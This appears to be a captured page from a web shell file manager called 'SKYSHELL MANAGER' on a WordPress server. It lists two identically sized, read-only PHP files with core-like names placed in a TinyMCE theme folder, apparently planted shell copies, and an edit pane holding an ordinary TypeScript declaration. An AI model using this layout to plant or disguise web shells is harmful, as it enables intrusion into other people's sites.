📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: GetMethod.d.ts
import type { PropertyKey } from '../index'; declare function GetMethod<O, P extends PropertyKey>( O: O, P: P, ): P extends keyof O // tslint:disable-next-line: ban-types ? NonNullable<O[P]> extends Function ? O[P] : never : ((...args: any) => any) | undefined; export = GetMethod;
Save